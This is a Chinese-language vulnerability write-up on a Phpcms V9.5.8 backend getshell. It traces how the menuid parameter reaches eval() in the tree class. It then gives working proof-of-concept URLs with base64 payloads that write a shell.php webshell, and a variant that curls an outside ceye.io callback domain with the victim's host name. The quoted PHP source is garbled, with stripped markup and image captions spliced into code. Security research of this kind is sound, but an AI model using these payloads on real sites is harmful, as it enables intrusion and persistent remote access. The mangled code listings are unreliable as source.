Phpcms_V9.5.8_后台getshell

# Phpcms V9.5.8 后台getshell

==========================

一、漏洞简介
————

二、漏洞影响
————

Phpcms V9.5.8

三、复现过程
————

### 漏洞分析

代码位于`/phpcms/modules/content/content.php` 第472-532行

public function public_categorys() {
$show_header = ”;
$cfg = getcache(‘common’,’commons’);
$ajax_show = intval($cfg[‘category_ajax’]);
$from = isset($_GET[‘from’]) && in_array($_GET[‘from’],array(‘block’)) ? $_GET[‘from’] : ‘content’;
$tree = pc_base::load_sys_class(‘tree’);
if($from==’content’ && $_SESSION[‘roleid’] != 1) {
$this->priv_db = pc_base::load_model(‘category_priv_model’);
$priv_result = $this->priv_db->select(array(‘action’=>’init’,’roleid’=>$_SESSION[‘roleid’],’siteid’=>$this->siteid,’is_admin’=>1));
$priv_catids = array();
foreach($priv_result as $_v) {
$priv_catids[] = $_v[‘catid’];
}
if(empty($priv_catids)) return ”;
}
$categorys = array();
if(!empty($this->categorys)) {
foreach($this->categorys as $r) {
if($r[‘siteid’]!=$this->siteid || ($r[‘type’]==2 && $r[‘child’]==0)) continue;
if($from==’content’ && $_SESSION[‘roleid’] != 1 && !in_array($r[‘catid’],$priv_catids)) {
$arrchildid = explode(‘,’,$r[‘arrchildid’]);
$array_intersect = array_intersect($priv_catids,$arrchildid);
if(empty($array_intersect)) continue;
}
if($r[‘type’]==1 || $from==’block’) {
if($r[‘type’]==0) {
$r[‘vs_show’] = “[“.L(‘content_page’).”]“;
} else {
$r[‘vs_show’] =”;
}
$r[‘icon_type’] = ‘file’;
$r[‘add_icon’] = ”;
$r[‘type’] = ‘add’;
} else {
$r[‘icon_type’] = $r[‘vs_show’] = ”;
$r[‘type’] = ‘init’;
$r[‘add_icon’] = “图片[1]-Phpcms_V9.5.8_后台getshell-棉花糖会员站 “;
}
$categorys[$r[‘catid’]] = $r;
}
}
if(!empty($categorys)) {
$tree->init($categorys);
switch($from) {
case ‘block’:
$strs = “\$add_icon\$catname \$vs_show“;
$strs2 = “图片[2]-Phpcms_V9.5.8_后台getshell-棉花糖会员站 \$catname“;
break;

default:
$strs = “\$add_icon\$catname“;
$strs2 = “\$catname“;
break;
}
$categorys = $tree->get_treeview(0,’category_tree’,$strs,$strs2,$ajax_show);
} else {
$categorys = L(‘please_add_category’);
}
include $this->admin_tpl(‘category_tree’);
exit;
}

复制 文本

在当前函数开始下个断点

![1.png](./resource/PhpcmsV9.5.8后台getshell/media/rId25.png)![2.png](/static/qingy/Phpcms_V9.5.8_后台getshell/img/rId26.png)

跟到526行:

$categorys = $tree->get_treeview(0,’category_tree’,$strs,$strs2,$ajax_show);

复制 文本

进入了`get_treeview()`函数,跟入进去,

函数位于 `/phpcms/libs/classes/tree.class.php` 第206-239行。

* @param $myid 表示获得这个ID下的所有子级
* @param $effected_id 需要生成treeview目录数的id
* @param $str 末级样式
* @param $str2 目录级别样式
* @param $showlevel 直接显示层级数,其余为异步显示,0为全部限制
* @param $style 目录样式 默认 filetree 可增加其他样式如’filetree treeview-famfamfam’
* @param $currentlevel 计算当前层级,递归使用 适用改函数时不需要用该参数
* @param $recursion 递归使用 外部调用时为FALSE
function get_treeview($myid,$effected_id=’example’,$str=”\$name“, $str2=”\$name” ,$showlevel = 0 ,$style=’filetree ‘ , $currentlevel = 1,$recursion=FALSE) {
$child = $this->get_child($myid);
if(!defined(‘EFFECTED_INIT’)){
$effected = ‘ id=”‘.$effected_id.'”‘;
define(‘EFFECTED_INIT’, 1);
} else {
$effected = ”;
}
$placeholder = ‘

‘;
if(!$recursion) $this->str .=’‘;
foreach($child as $id=>$a) {

@extract($a);
if($showlevel > 0 && $showlevel == $currentlevel && $this->get_child($id)) $folder = ‘hasChildren’; [email protected]
$floder_status = isset($folder) ? ‘ class=”‘.$folder.'”‘ : ”;
$this->str .= $recursion ? ‘

    ‘ : ‘‘;
    $recursion = FALSE;
    if($this->get_child($id)){
    eval(“\$nstr = \”$str2\”;”);
    $this->str .= $nstr;
    if($showlevel == 0 || ($showlevel > 0 && $showlevel > $currentlevel)) {
    $this->get_treeview($id, $effected_id, $str, $str2, $showlevel, $style, $currentlevel+1, TRUE);
    } elseif($showlevel > 0 && $showlevel == $currentlevel) {
    $this->str .= $placeholder;
    }
    } else {
    eval(“\$nstr = \”$str\”;”);
    $this->str .= $nstr;
    }
    $this->str .=$recursion ? ‘

‘: ‘

‘;
}
if(!$recursion) $this->str .=’

‘;
return $this->str;
}

复制 文本

这里有个判断:

if($this->get_child($id))

![3.png](/static/qingy/Phpcms_V9.5.8_后台getshell/img/rId27.png)

当第一次执行为ture的时候,还是会再次执行`get_treeview`的内容

$this->get_treeview($id, $effected_id, $str, $str2, $showlevel, $style, $currentlevel+1, TRUE);

第二次执行的时候`$myid`由0变成了1,

这时候的`$newarr`为空,

if就不执行,转而执行elseif和else,而`$str`包含着`menuid`的值,[email protected]()}`
,这时候`eval()` 就执行了php代码。

### 漏洞复现

**常规poc:**`https://www.0-sec.org/index.php?m=content&c=content&a=public_categorys&[email protected]()}`

**进阶版poc:**`https://www.0-sec.org/index.php?m=content&c=content&a=public_categorys&menuid=${@(assert(base64_decode(ZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycpOw)))}`

> 密码1,这要管理员权限才能代码执行,修改下payload,管理员一访问就在当前域名的首页路径下生成shell。

`print_r(base64_encode(“fputs(fopen(‘shell.php’,’w’),’ 还有另一种payload,会回显的提醒。自动curl请求你的域名,然后回显网站url
>
> 先输出base64的地址,然后在替换下面的字符串> `https://www.0-sec.org/index.php?m=content&c=content&a=public_categorys&menuid=(${@(assert(eval(base64_decode(ZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbMl0pOycpO3N5c3RlbSgnY3VybCAnLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLic0MzIxLm5yY3VmOS5jZXllLmlvJyk7))))})`

这个字符串有几个点提醒下自己,` assert()`函数执行执行一句php代码,所以在assert前面加个eval,执行多条语句。

参考链接
——–

> https://www.mrwu.red/web/2723.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容